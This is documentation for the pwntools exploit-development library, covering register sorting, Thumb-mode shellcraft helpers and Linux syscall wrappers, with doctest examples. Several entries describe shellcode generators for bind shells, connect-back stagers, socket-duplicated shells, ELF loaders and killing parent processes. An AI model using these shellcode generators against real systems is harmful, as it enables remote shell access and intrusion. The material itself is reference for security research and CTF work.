>>> regsort({'a': 1, 'b': 2}, R) [('mov', 'a', 1), ('mov', 'b', 2)] >>> regsort({'a': 'b', 'b': 'a'}, R) [('xchg', 'a', 'b')] >>> regsort({'a': 'b', 'b': 'a'}, R, tmp='X') [('mov', 'X', 'a'), ('mov', 'a', 'b'), ('mov', 'b', 'X')] >>> regsort({'a': 1, 'b': 'a'}, R) [('mov', 'b', 'a'), ('mov', 'a', 1)] >>> regsort({'a': 'b', 'b': 'a', 'c': 3}, R) [('mov', 'c', 3), ('xchg', 'a', 'b')] >>> regsort({'a': 'b', 'b': 'a', 'c': 'b'}, R) [('mov', 'c', 'b'), ('xchg', 'a', 'b')] >>> regsort({'a':'b', 'b':'a', 'x':'b'}, R, tmp='y', xchg=False) [('mov', 'x', 'b'), ('mov', 'y', 'a'), ('mov', 'a', 'b'), ('mov', 'b', 'y')] >>> regsort({'a':'b', 'b':'a', 'x':'b'}, R, tmp='x', xchg=False) Traceback (most recent call last): ... PwnlibException: Cannot break dependency cycles ... >>> regsort({'a':'b','b':'c','c':'a','x':'1','y':'z','z':'c'}, R) [('mov', 'x', '1'), ('mov', 'y', 'z'), ('mov', 'z', 'c'), ('xchg', 'a', 'b'), ('xchg', 'b', 'c')] >>> regsort({'a':'b','b':'c','c':'a','x':'1','y':'z','z':'c'}, R, tmp='x') [('mov', 'y', 'z'), ('mov', 'z', 'c'), ('mov', 'x', 'a'), ('mov', 'a', 'b'), ('mov', 'b', 'c'), ('mov', 'c', 'x'), ('mov', 'x', '1')] >>> regsort({'a':'b','b':'c','c':'a','x':'1','y':'z','z':'c'}, R, xchg=0) [('mov', 'y', 'z'), ('mov', 'z', 'c'), ('mov', 'x', 'a'), ('mov', 'a', 'b'), ('mov', 'b', 'c'), ('mov', 'c', 'x'), ('mov', 'x', '1')]
- If
-
pwnlib.regsort.
resolve_order
(reg, deps)[source]¶ Resolve the order of all dependencies starting at a given register.
Example
>>> want = {'a': 1, 'b': 'c', 'c': 'd', 'd': 7, 'x': 'd'} >>> deps = {'a': [], 'b': [], 'c': ['b'], 'd': ['c', 'x'], 'x': []} >>> resolve_order('a', deps) ['a'] >>> resolve_order('b', deps) ['b'] >>> resolve_order('c', deps) ['b', 'c'] >>> resolve_order('d', deps) ['b', 'c', 'x', 'd']
pwnlib.shellcraft.thumb
— Shellcode for Thumb Mode¶
pwnlib.shellcraft.thumb
¶
Shellcraft module containing generic thumb little endian shellcodes.
-
pwnlib.shellcraft.thumb.
crash
()[source]¶ Crash.
Example
>>> run_assembly(shellcraft.crash()).poll(True) < 0 True
-
pwnlib.shellcraft.thumb.
itoa
(v, buffer='sp', allocate_stack=True)[source]¶ Converts an integer into its string representation, and pushes it onto the stack. Uses registers r0-r5.
Parameters: - v (str, int) – Integer constant or register that contains the value to convert.
- alloca –
Example
>>> sc = shellcraft.thumb.mov('r0', 0xdeadbeef) >>> sc += shellcraft.thumb.itoa('r0') >>> sc += shellcraft.thumb.linux.write(1, 'sp', 32) >>> run_assembly(sc).recvuntil('\x00') '3735928559\x00'
-
pwnlib.shellcraft.thumb.
memcpy
(dest, src, n)[source]¶ Copies memory.
Parameters: - dest – Destination address
- src – Source address
- n – Number of bytes
-
pwnlib.shellcraft.thumb.
mov
(dst, src)[source]¶ Returns THUMB code for moving the specified source value into the specified destination register.
If src is a string that is not a register, then it will locally set context.arch to ‘thumb’ and use
pwnlib.constants.eval()
to evaluate the string. Note that this means that this shellcode can change behavior depending on the value of context.os.Example
>>> print shellcraft.thumb.mov('r1','r2').rstrip() mov r1, r2 >>> print shellcraft.thumb.mov('r1', 0).rstrip() eor r1, r1 >>> print shellcraft.thumb.mov('r1', 10).rstrip() mov r1, #0xa + 1 sub r1, r1, 1 >>> print shellcraft.thumb.mov('r1', 17).rstrip() mov r1, #0x11 >>> print shellcraft.thumb.mov('r1', 'r1').rstrip() /* moving r1 into r1, but this is a no-op */ >>> print shellcraft.thumb.mov('r1', 512).rstrip() mov r1, #0x200 >>> print shellcraft.thumb.mov('r1', 0x10000001).rstrip() mov r1, #(0x10000001 >> 28) lsl r1, #28 add r1, #(0x10000001 & 0xff) >>> print shellcraft.thumb.mov('r1', 0xdead0000).rstrip() mov r1, #(0xdead0000 >> 25) lsl r1, #(25 - 16) add r1, #((0xdead0000 >> 16) & 0xff) lsl r1, #16 >>> print shellcraft.thumb.mov('r1', 0xdead00ff).rstrip() ldr r1, value_... b value_..._after value_...: .word 0xdead00ff value_..._after: >>> with context.local(os = 'linux'): ... print shellcraft.thumb.mov('r1', 'SYS_execve').rstrip() mov r1, #(SYS_execve) /* 0xb */ >>> with context.local(os = 'freebsd'): ... print shellcraft.thumb.mov('r1', 'SYS_execve').rstrip() mov r1, #(SYS_execve) /* 0x3b */ >>> with context.local(os = 'linux'): ... print shellcraft.thumb.mov('r1', 'PROT_READ | PROT_WRITE | PROT_EXEC').rstrip() mov r1, #(PROT_READ | PROT_WRITE | PROT_EXEC) /* 7 */
-
pwnlib.shellcraft.thumb.
popad
()[source]¶ Pop all of the registers onto the stack which i386 popad does, in the same order.
-
pwnlib.shellcraft.thumb.
push
(value)[source]¶ Pushes a value onto the stack without using null bytes or newline characters.
If src is a string, then we try to evaluate with context.arch = ‘thumb’ using
pwnlib.constants.eval()
before determining how to push it. Note that this means that this shellcode can change behavior depending on the value of context.os.Parameters: value (int,str) – The value or register to push Example
>>> print pwnlib.shellcraft.thumb.push('r0').rstrip() push {r0} >>> print pwnlib.shellcraft.thumb.push(0).rstrip() /* push 0 */ eor r7, r7 push {r7} >>> print pwnlib.shellcraft.thumb.push(1).rstrip() /* push 1 */ mov r7, #1 push {r7} >>> print pwnlib.shellcraft.thumb.push(256).rstrip() /* push 256 */ mov r7, #0x100 push {r7} >>> print pwnlib.shellcraft.thumb.push('SYS_execve').rstrip() /* push 'SYS_execve' */ mov r7, #0xb push {r7} >>> with context.local(os = 'freebsd'): ... print pwnlib.shellcraft.thumb.push('SYS_execve').rstrip() /* push 'SYS_execve' */ mov r7, #0x3b push {r7}
-
pwnlib.shellcraft.thumb.
pushad
()[source]¶ Push all of the registers onto the stack which i386 pushad does, in the same order.
-
pwnlib.shellcraft.thumb.
pushstr
(string, append_null=True, register='r7')[source]¶ Pushes a string onto the stack without using null bytes or newline characters.
Parameters: Examples:
Note that this doctest has two possibilities for the first result, depending on your version of binutils.
>>> enhex(asm(shellcraft.pushstr('Hello\nWorld!', True))) in [ ... '87ea070780b4dff8047001e0726c642180b4dff8047001e06f0a576f80b4dff8047001e048656c6c80b4', ... '87ea070780b4dff8067000f002b8726c642180b4dff8047000f002b86f0a576f80b4014f00f002b848656c6c80b4'] True >>> print shellcraft.pushstr('abc').rstrip() /* push 'abc\x00' */ ldr r7, value_... b value_..._after value_...: .word 0xff636261 value_..._after: lsl r7, #8 lsr r7, #8 push {r7} >>> print enhex(asm(shellcraft.pushstr('\x00', False))) 87ea070780b4
-
pwnlib.shellcraft.thumb.
pushstr_array
(reg, array)[source]¶ Pushes an array/envp-style array of pointers onto the stack.
Parameters: - reg (str) – Destination register to hold the pointer.
- array (str,list) – Single argument or list of arguments to push. NULL termination is normalized so that each argument ends with exactly one NULL byte.
-
pwnlib.shellcraft.thumb.
ret
(return_value=None)[source]¶ A single-byte RET instruction.
Parameters: return_value – Value to return
-
pwnlib.shellcraft.thumb.
setregs
(reg_context, stack_allowed=True)[source]¶ Sets multiple registers, taking any register dependencies into account (i.e., given eax=1,ebx=eax, set ebx first).
Parameters: Example
>>> print shellcraft.setregs({'r0':1, 'r2':'r3'}).rstrip() mov r0, #1 mov r2, r3 >>> print shellcraft.setregs({'r0':'r1', 'r1':'r0', 'r2':'r3'}).rstrip() mov r2, r3 eor r0, r0, r1 /* xchg r0, r1 */ eor r1, r0, r1 eor r0, r0, r1
-
pwnlib.shellcraft.thumb.
udiv_10
(N)[source]¶ Divides r0 by 10. Result is stored in r0, N and Z flags are updated.
- Code is from generated from here:
- https://raw.githubusercontent.com/rofirrim/raspberry-pi-assembler/master/chapter15/magic.py
- With code:
- python magic.py 10 code_for_unsigned
pwnlib.shellcraft.thumb.linux
¶
Shellcraft module containing THUMB shellcodes for Linux.
-
pwnlib.shellcraft.thumb.linux.
accept
(fd, addr, addr_len)[source]¶ Invokes the syscall accept. See ‘man 2 accept’ for more information.
Parameters: - fd (int) – fd
- addr (SOCKADDR_ARG) – addr
- addr_len (socklen_t) – addr_len
-
pwnlib.shellcraft.thumb.linux.
access
(name, type)[source]¶ Invokes the syscall access. See ‘man 2 access’ for more information.
Parameters: - name (char) – name
- type (int) – type
-
pwnlib.shellcraft.thumb.linux.
acct
(name)[source]¶ Invokes the syscall acct. See ‘man 2 acct’ for more information.
Parameters: name (char) – name
-
pwnlib.shellcraft.thumb.linux.
alarm
(seconds)[source]¶ Invokes the syscall alarm. See ‘man 2 alarm’ for more information.
Parameters: seconds (unsigned) – seconds
-
pwnlib.shellcraft.thumb.linux.
bind
(fd, addr, length)[source]¶ Invokes the syscall bind. See ‘man 2 bind’ for more information.
Parameters: - fd (int) – fd
- addr (CONST_SOCKADDR_ARG) – addr
- len (socklen_t) – len
-
pwnlib.shellcraft.thumb.linux.
bindsh
(port, network)[source]¶ Listens on a TCP port and spawns a shell for the first to connect. Port is the TCP port to listen on, network is either ‘ipv4’ or ‘ipv6’.
-
pwnlib.shellcraft.thumb.linux.
brk
(addr)[source]¶ Invokes the syscall brk. See ‘man 2 brk’ for more information.
Parameters: addr (void) – addr
-
pwnlib.shellcraft.thumb.linux.
cat
(filename, fd=1)[source]¶ Opens a file and writes its contents to the specified file descriptor.
Example
>>> f = tempfile.mktemp() >>> write(f, 'FLAG\n') >>> run_assembly(shellcraft.arm.to_thumb()+shellcraft.thumb.linux.cat(f)).recvline() 'FLAG\n'
-
pwnlib.shellcraft.thumb.linux.
chdir
(path)[source]¶ Invokes the syscall chdir. See ‘man 2 chdir’ for more information.
Parameters: path (char) – path
-
pwnlib.shellcraft.thumb.linux.
chmod
(file, mode)[source]¶ Invokes the syscall chmod. See ‘man 2 chmod’ for more information.
Parameters: - file (char) – file
- mode (mode_t) – mode
-
pwnlib.shellcraft.thumb.linux.
chown
(file, owner, group)[source]¶ Invokes the syscall chown. See ‘man 2 chown’ for more information.
Parameters: - file (char) – file
- owner (uid_t) – owner
- group (gid_t) – group
-
pwnlib.shellcraft.thumb.linux.
chroot
(path)[source]¶ Invokes the syscall chroot. See ‘man 2 chroot’ for more information.
Parameters: path (char) – path
-
pwnlib.shellcraft.thumb.linux.
clock_getres
(clock_id, res)[source]¶ Invokes the syscall clock_getres. See ‘man 2 clock_getres’ for more information.
Parameters: - clock_id (clockid_t) – clock_id
- res (timespec) – res
-
pwnlib.shellcraft.thumb.linux.
clock_gettime
(clock_id, tp)[source]¶ Invokes the syscall clock_gettime. See ‘man 2 clock_gettime’ for more information.
Parameters: - clock_id (clockid_t) – clock_id
- tp (timespec) – tp
-
pwnlib.shellcraft.thumb.linux.
clock_nanosleep
(clock_id, flags, req, rem)[source]¶ Invokes the syscall clock_nanosleep. See ‘man 2 clock_nanosleep’ for more information.
Parameters: - clock_id (clockid_t) – clock_id
- flags (int) – flags
- req (timespec) – req
- rem (timespec) – rem
-
pwnlib.shellcraft.thumb.linux.
clock_settime
(clock_id, tp)[source]¶ Invokes the syscall clock_settime. See ‘man 2 clock_settime’ for more information.
Parameters: - clock_id (clockid_t) – clock_id
- tp (timespec) – tp
-
pwnlib.shellcraft.thumb.linux.
clone
(fn, child_stack, flags, arg, vararg)[source]¶ Invokes the syscall clone. See ‘man 2 clone’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
close
(fd)[source]¶ Invokes the syscall close. See ‘man 2 close’ for more information.
Parameters: fd (int) – fd
-
pwnlib.shellcraft.thumb.linux.
connect
(host, port, network='ipv4')[source]¶ Connects to the host on the specified port. Network is either ‘ipv4’ or ‘ipv6’. Leaves the connected socket in R6.
-
pwnlib.shellcraft.thumb.linux.
connectstager
(host, port, network='ipv4')[source]¶ connect recvsize stager :param host, where to connect to: :param port, which port to connect to: :param network, ipv4 or ipv6? (default: ipv4)
-
pwnlib.shellcraft.thumb.linux.
creat
(file, mode)[source]¶ Invokes the syscall creat. See ‘man 2 creat’ for more information.
Parameters: - file (char) – file
- mode (mode_t) – mode
-
pwnlib.shellcraft.thumb.linux.
dup
(sock='r6')[source]¶ Args: [sock (imm/reg) = r6] Duplicates sock to stdin, stdout and stderr
-
pwnlib.shellcraft.thumb.linux.
dup2
(fd, fd2)[source]¶ Invokes the syscall dup2. See ‘man 2 dup2’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
dup3
(fd, fd2, flags)[source]¶ Invokes the syscall dup3. See ‘man 2 dup3’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
dupsh
(sock='r6')[source]¶ Args: [sock (imm/reg) = ebp] Duplicates sock to stdin, stdout and stderr and spawns a shell.
-
pwnlib.shellcraft.thumb.linux.
echo
(string, sock='1')[source]¶ Writes a string to a file descriptor
Example
>>> run_assembly(shellcraft.echo('hello\n', 1)).recvline() 'hello\n'
-
pwnlib.shellcraft.thumb.linux.
epoll_create
(size)[source]¶ Invokes the syscall epoll_create. See ‘man 2 epoll_create’ for more information.
Parameters: size (int) – size
-
pwnlib.shellcraft.thumb.linux.
epoll_create1
(flags)[source]¶ Invokes the syscall epoll_create1. See ‘man 2 epoll_create1’ for more information.
Parameters: flags (int) – flags
-
pwnlib.shellcraft.thumb.linux.
epoll_ctl
(epfd, op, fd, event)[source]¶ Invokes the syscall epoll_ctl. See ‘man 2 epoll_ctl’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
epoll_pwait
(epfd, events, maxevents, timeout, ss)[source]¶ Invokes the syscall epoll_pwait. See ‘man 2 epoll_pwait’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
epoll_wait
(epfd, events, maxevents, timeout)[source]¶ Invokes the syscall epoll_wait. See ‘man 2 epoll_wait’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
execve
(path='/bin///sh', argv=[], envp={})[source]¶ Execute a different process.
>>> path = '/bin/sh' >>> argv = ['sh', '-c', 'echo Hello, $NAME; exit $STATUS'] >>> envp = {'NAME': 'zerocool', 'STATUS': 3} >>> sc = shellcraft.arm.linux.execve(path, argv, envp) >>> io = run_assembly(sc) >>> io.recvall() 'Hello, zerocool\n' >>> io.poll(True) 3
-
pwnlib.shellcraft.thumb.linux.
exit
(status)[source]¶ Invokes the syscall exit. See ‘man 2 exit’ for more information.
Parameters: status (int) – status
-
pwnlib.shellcraft.thumb.linux.
faccessat
(fd, file, type, flag)[source]¶ Invokes the syscall faccessat. See ‘man 2 faccessat’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
fallocate
(fd, mode, offset, length)[source]¶ Invokes the syscall fallocate. See ‘man 2 fallocate’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
fchdir
(fd)[source]¶ Invokes the syscall fchdir. See ‘man 2 fchdir’ for more information.
Parameters: fd (int) – fd
-
pwnlib.shellcraft.thumb.linux.
fchmod
(fd, mode)[source]¶ Invokes the syscall fchmod. See ‘man 2 fchmod’ for more information.
Parameters: - fd (int) – fd
- mode (mode_t) – mode
-
pwnlib.shellcraft.thumb.linux.
fchmodat
(fd, file, mode, flag)[source]¶ Invokes the syscall fchmodat. See ‘man 2 fchmodat’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
fchown
(fd, owner, group)[source]¶ Invokes the syscall fchown. See ‘man 2 fchown’ for more information.
Parameters: - fd (int) – fd
- owner (uid_t) – owner
- group (gid_t) – group
-
pwnlib.shellcraft.thumb.linux.
fchownat
(fd, file, owner, group, flag)[source]¶ Invokes the syscall fchownat. See ‘man 2 fchownat’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
fcntl
(fd, cmd, vararg)[source]¶ Invokes the syscall fcntl. See ‘man 2 fcntl’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
fdatasync
(fildes)[source]¶ Invokes the syscall fdatasync. See ‘man 2 fdatasync’ for more information.
Parameters: fildes (int) – fildes
-
pwnlib.shellcraft.thumb.linux.
findpeer
(port)[source]¶ Finds a connected socket. If port is specified it is checked against the peer port. Resulting socket is left in r6.
-
pwnlib.shellcraft.thumb.linux.
findpeersh
(port)[source]¶ Finds a connected socket. If port is specified it is checked against the peer port. A dup2 shell is spawned on it.
-
pwnlib.shellcraft.thumb.linux.
findpeerstager
(port=None)[source]¶ Findpeer recvsize stager :param port, the port given to findpeer: :type port, the port given to findpeer: defaults to any
-
pwnlib.shellcraft.thumb.linux.
flock
(fd, operation)[source]¶ Invokes the syscall flock. See ‘man 2 flock’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
fork
()[source]¶ Invokes the syscall fork. See ‘man 2 fork’ for more information.
Arguments:
-
pwnlib.shellcraft.thumb.linux.
forkexit
()[source]¶ Attempts to fork. If the fork is successful, the parent exits.
-
pwnlib.shellcraft.thumb.linux.
fstat
(fd, buf)[source]¶ Invokes the syscall fstat. See ‘man 2 fstat’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
fstat64
(fd, buf)[source]¶ Invokes the syscall fstat64. See ‘man 2 fstat64’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
fstatat64
(fd, file, buf, flag)[source]¶ Invokes the syscall fstatat64. See ‘man 2 fstatat64’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
fsync
(fd)[source]¶ Invokes the syscall fsync. See ‘man 2 fsync’ for more information.
Parameters: fd (int) – fd
-
pwnlib.shellcraft.thumb.linux.
ftruncate
(fd, length)[source]¶ Invokes the syscall ftruncate. See ‘man 2 ftruncate’ for more information.
Parameters: - fd (int) – fd
- length (off_t) – length
-
pwnlib.shellcraft.thumb.linux.
ftruncate64
(fd, length)[source]¶ Invokes the syscall ftruncate64. See ‘man 2 ftruncate64’ for more information.
Parameters: - fd (int) – fd
- length (off64_t) – length
-
pwnlib.shellcraft.thumb.linux.
futimesat
(fd, file, tvp)[source]¶ Invokes the syscall futimesat. See ‘man 2 futimesat’ for more information.
Parameters: - fd (int) – fd
- file (char) – file
- tvp (timeval) – tvp
-
pwnlib.shellcraft.thumb.linux.
getcwd
(buf, size)[source]¶ Invokes the syscall getcwd. See ‘man 2 getcwd’ for more information.
Parameters: - buf (char) – buf
- size (size_t) – size
-
pwnlib.shellcraft.thumb.linux.
getegid
()[source]¶ Invokes the syscall getegid. See ‘man 2 getegid’ for more information.
Arguments:
-
pwnlib.shellcraft.thumb.linux.
geteuid
()[source]¶ Invokes the syscall geteuid. See ‘man 2 geteuid’ for more information.
Arguments:
-
pwnlib.shellcraft.thumb.linux.
getgid
()[source]¶ Invokes the syscall getgid. See ‘man 2 getgid’ for more information.
Arguments:
-
pwnlib.shellcraft.thumb.linux.
getgroups
(size, list)[source]¶ Invokes the syscall getgroups. See ‘man 2 getgroups’ for more information.
Parameters: - size (int) – size
- list (gid_t) – list
-
pwnlib.shellcraft.thumb.linux.
getitimer
(which, value)[source]¶ Invokes the syscall getitimer. See ‘man 2 getitimer’ for more information.
Parameters: - which (itimer_which_t) – which
- value (itimerval) – value
-
pwnlib.shellcraft.thumb.linux.
getpeername
(fd, addr, length)[source]¶ Invokes the syscall getpeername. See ‘man 2 getpeername’ for more information.
Parameters: - fd (int) – fd
- addr (SOCKADDR_ARG) – addr
- len (socklen_t) – len
-
pwnlib.shellcraft.thumb.linux.
getpgid
(pid)[source]¶ Invokes the syscall getpgid. See ‘man 2 getpgid’ for more information.
Parameters: pid (pid_t) – pid
-
pwnlib.shellcraft.thumb.linux.
getpgrp
()[source]¶ Invokes the syscall getpgrp. See ‘man 2 getpgrp’ for more information.
Arguments:
-
pwnlib.shellcraft.thumb.linux.
getpid
()[source]¶ Invokes the syscall getpid. See ‘man 2 getpid’ for more information.
Arguments:
-
pwnlib.shellcraft.thumb.linux.
getpmsg
(fildes, ctlptr, dataptr, bandp, flagsp)[source]¶ Invokes the syscall getpmsg. See ‘man 2 getpmsg’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
getppid
()[source]¶ Invokes the syscall getppid. See ‘man 2 getppid’ for more information.
Arguments:
-
pwnlib.shellcraft.thumb.linux.
getpriority
(which, who)[source]¶ Invokes the syscall getpriority. See ‘man 2 getpriority’ for more information.
Parameters: - which (priority_which_t) – which
- who (id_t) – who
-
pwnlib.shellcraft.thumb.linux.
getresgid
(rgid, egid, sgid)[source]¶ Invokes the syscall getresgid. See ‘man 2 getresgid’ for more information.
Parameters: - rgid (gid_t) – rgid
- egid (gid_t) – egid
- sgid (gid_t) – sgid
-
pwnlib.shellcraft.thumb.linux.
getresuid
(ruid, euid, suid)[source]¶ Invokes the syscall getresuid. See ‘man 2 getresuid’ for more information.
Parameters: - ruid (uid_t) – ruid
- euid (uid_t) – euid
- suid (uid_t) – suid
-
pwnlib.shellcraft.thumb.linux.
getrlimit
(resource, rlimits)[source]¶ Invokes the syscall getrlimit. See ‘man 2 getrlimit’ for more information.
Parameters: - resource (rlimit_resource_t) – resource
- rlimits (rlimit) – rlimits
-
pwnlib.shellcraft.thumb.linux.
getrusage
(who, usage)[source]¶ Invokes the syscall getrusage. See ‘man 2 getrusage’ for more information.
Parameters: - who (rusage_who_t) – who
- usage (rusage) – usage
-
pwnlib.shellcraft.thumb.linux.
getsid
(pid)[source]¶ Invokes the syscall getsid. See ‘man 2 getsid’ for more information.
Parameters: pid (pid_t) – pid
-
pwnlib.shellcraft.thumb.linux.
getsockname
(fd, addr, length)[source]¶ Invokes the syscall getsockname. See ‘man 2 getsockname’ for more information.
Parameters: - fd (int) – fd
- addr (SOCKADDR_ARG) – addr
- len (socklen_t) – len
-
pwnlib.shellcraft.thumb.linux.
getsockopt
(fd, level, optname, optval, optlen)[source]¶ Invokes the syscall getsockopt. See ‘man 2 getsockopt’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
gettimeofday
(tv, tz)[source]¶ Invokes the syscall gettimeofday. See ‘man 2 gettimeofday’ for more information.
Parameters: - tv (timeval) – tv
- tz (timezone_ptr_t) – tz
-
pwnlib.shellcraft.thumb.linux.
getuid
()[source]¶ Invokes the syscall getuid. See ‘man 2 getuid’ for more information.
Arguments:
-
pwnlib.shellcraft.thumb.linux.
gtty
(fd, params)[source]¶ Invokes the syscall gtty. See ‘man 2 gtty’ for more information.
Parameters: - fd (int) – fd
- params (sgttyb) – params
-
pwnlib.shellcraft.thumb.linux.
ioctl
(fd, request, vararg)[source]¶ Invokes the syscall ioctl. See ‘man 2 ioctl’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
ioperm
(from_, num, turn_on)[source]¶ Invokes the syscall ioperm. See ‘man 2 ioperm’ for more information.
Parameters: - from (unsigned) – from
- num (unsigned) – num
- turn_on (int) – turn_on
-
pwnlib.shellcraft.thumb.linux.
iopl
(level)[source]¶ Invokes the syscall iopl. See ‘man 2 iopl’ for more information.
Parameters: level (int) – level
-
pwnlib.shellcraft.thumb.linux.
kill
(pid, sig)[source]¶ Invokes the syscall kill. See ‘man 2 kill’ for more information.
Parameters: - pid (pid_t) – pid
- sig (int) – sig
-
pwnlib.shellcraft.thumb.linux.
killparent
()[source]¶ Kills its parent process until whatever the parent is (probably init) cannot be killed any longer.
-
pwnlib.shellcraft.thumb.linux.
lchown
(file, owner, group)[source]¶ Invokes the syscall lchown. See ‘man 2 lchown’ for more information.
Parameters: - file (char) – file
- owner (uid_t) – owner
- group (gid_t) – group
-
pwnlib.shellcraft.thumb.linux.
link
(from_, to)[source]¶ Invokes the syscall link. See ‘man 2 link’ for more information.
Parameters: - from (char) – from
- to (char) – to
-
pwnlib.shellcraft.thumb.linux.
linkat
(fromfd, from_, tofd, to, flags)[source]¶ Invokes the syscall linkat. See ‘man 2 linkat’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
listen
(port, network)[source]¶ Listens on a TCP port, accept a client and leave his socket in r6. Port is the TCP port to listen on, network is either ‘ipv4’ or ‘ipv6’.
-
pwnlib.shellcraft.thumb.linux.
loader
(address)[source]¶ Loads a statically-linked ELF into memory and transfers control.
Parameters: address (int) – Address of the ELF as a register or integer.
-
pwnlib.shellcraft.thumb.linux.
loader_append
(data=None)[source]¶ Loads a statically-linked ELF into memory and transfers control.
Similar to loader.asm but loads an appended ELF.
Parameters: data (str) – If a valid filename, the data is loaded from the named file. Otherwise, this is treated as raw ELF data to append. If None
, it is ignored.Example:
The following doctest is commented out because it doesn’t work on Travis for reasons I cannot diagnose. However, it should work just fine :-)
# >>> gcc = process([‘arm-linux-gnueabihf-gcc’,’-xc’,’-static’,’-Wl,-Ttext-segment=0x20000000’,’-‘]) # >>> gcc.write(‘’’ # ... int main() { # ... printf(“Hello, %s!\n”, “world”); # ... } # ... ‘’‘) # >>> gcc.shutdown(‘send’) # >>> gcc.poll(True) # 0 # >>> sc = shellcraft.loader_append(‘a.out’) # >>> run_assembly(sc).recvline() # ‘Hello, world!n’
-
pwnlib.shellcraft.thumb.linux.
lseek
(fd, offset, whence)[source]¶ Invokes the syscall lseek. See ‘man 2 lseek’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
lstat
(file, buf)[source]¶ Invokes the syscall lstat. See ‘man 2 lstat’ for more information.
Parameters: - file (char) – file
- buf (stat) – buf
-
pwnlib.shellcraft.thumb.linux.
lstat64
(file, buf)[source]¶ Invokes the syscall lstat64. See ‘man 2 lstat64’ for more information.
Parameters: - file (char) – file
- buf (stat64) – buf
-
pwnlib.shellcraft.thumb.linux.
madvise
(addr, length, advice)[source]¶ Invokes the syscall madvise. See ‘man 2 madvise’ for more information.
Parameters: - addr (void) – addr
- len (size_t) – len
- advice (int) – advice
-
pwnlib.shellcraft.thumb.linux.
mincore
(start, length, vec)[source]¶ Invokes the syscall mincore. See ‘man 2 mincore’ for more information.
Parameters: - start (void) – start
- len (size_t) – len
- vec (unsigned) – vec
-
pwnlib.shellcraft.thumb.linux.
mkdir
(path, mode)[source]¶ Invokes the syscall mkdir. See ‘man 2 mkdir’ for more information.
Parameters: - path (char) – path
- mode (mode_t) – mode
-
pwnlib.shellcraft.thumb.linux.
mkdirat
(fd, path, mode)[source]¶ Invokes the syscall mkdirat. See ‘man 2 mkdirat’ for more information.
Parameters: - fd (int) – fd
- path (char) – path
- mode (mode_t) – mode
-
pwnlib.shellcraft.thumb.linux.
mknod
(path, mode, dev)[source]¶ Invokes the syscall mknod. See ‘man 2 mknod’ for more information.
Parameters: - path (char) – path
- mode (mode_t) – mode
- dev (dev_t) – dev
-
pwnlib.shellcraft.thumb.linux.
mknodat
(fd, path, mode, dev)[source]¶ Invokes the syscall mknodat. See ‘man 2 mknodat’ for more information.
Parameters: - fd (int) – fd
- path (char) – path
- mode (mode_t) – mode
- dev (dev_t) – dev
-
pwnlib.shellcraft.thumb.linux.
mlock
(addr, length)[source]¶ Invokes the syscall mlock. See ‘man 2 mlock’ for more information.
Parameters: - addr (void) – addr
- len (size_t) – len
-
pwnlib.shellcraft.thumb.linux.
mlockall
(flags)[source]¶ Invokes the syscall mlockall. See ‘man 2 mlockall’ for more information.
Parameters: flags (int) – flags
-
pwnlib.shellcraft.thumb.linux.
mmap
(addr=0, length=4096, prot=7, flags=34, fd=-1, offset=0)[source]¶ Invokes the syscall mmap. See ‘man 2 mmap’ for more information.
Parameters:
-
pwnlib.shellcraft.thumb.linux.
mov
(dst, src)[source]¶ Returns THUMB code for moving the specified source value into the specified destination register.
If src is a string that is not a register, then it will locally set context.arch to ‘thumb’ and use
pwnlib.constants.eval()
to evaluate the string. Note that this means that this shellcode can change behavior depending on the value of context.os.Example
>>> print shellcraft.thumb.mov('r1','r2').rstrip() mov r1, r2 >>> print shellcraft.thumb.mov('r1', 0).rstrip() eor r1, r1 >>> print shellcraft.thumb.mov('r1', 10).rstrip() mov r1, #0xa + 1 sub r1, r1, 1 >>> print shellcraft.thumb.mov('r1', 17).rstrip() mov r1, #0x11 >>> print shellcraft.thumb.mov('r1', 'r1').rstrip() /* moving r1 into r1, but this is a no-op */ >>> print shellcraft.thumb.mov('r1', 512).rstrip() mov r1, #0x200 >>> print shellcraft.thumb.mov('r1', 0x10000001).rstrip() mov r1, #(0x10000001 >> 28) lsl r1, #28 add r1, #(0x10000001 & 0xff) >>> print shellcraft.thumb.mov('r1', 0xdead0000).rstrip() mov r1, #(0xdead0000 >> 25) lsl r1, #(25 - 16) add r1, #((0xdead0000 >> 16) & 0xff) lsl r1, #16 >>> print shellcraft.thumb.mov('r1', 0xdead00ff).rstrip() ldr r1, value_... b value_..._after value_...: .word 0xdead00ff value_..._after: >>> with context.local(os = 'linux'): ... print shellcraft.thumb.mov('r1', 'SYS_execve').rstrip() mov r1, #(SYS_execve) /* 0xb */ >>> with context.local(os = 'freebsd'): ... print shellcraft.thumb.mov('r1', 'SYS_execve').rstrip() mov r1, #(SYS_execve) /* 0x3b */ >>> with context.local(os = 'linux'): ... print shellcraft.thumb.mov('r1', 'PROT_READ | PROT_WRITE | PROT_EXEC').rstrip() mov r1, #(PROT_READ | PROT_WRITE | PROT_EXEC) /* 7 */
-
pwnlib.shellcraft.thumb.linux.
mprotect
(addr, length, prot)[source]¶ Invokes the syscall mprotect. See ‘man 2 mprotect’ for more information.
Parameters: - addr (void) – addr
- len (size_t) – len
- prot (int) – prot
-
pwnlib.shellcraft.thumb.linux.
mq_notify
(mqdes, notification)[source]¶ Invokes the syscall mq_notify. See ‘man 2 mq_notify’ for more information.
Parameters: - mqdes (mqd_t) – mqdes
- notification (sigevent) – notification
-
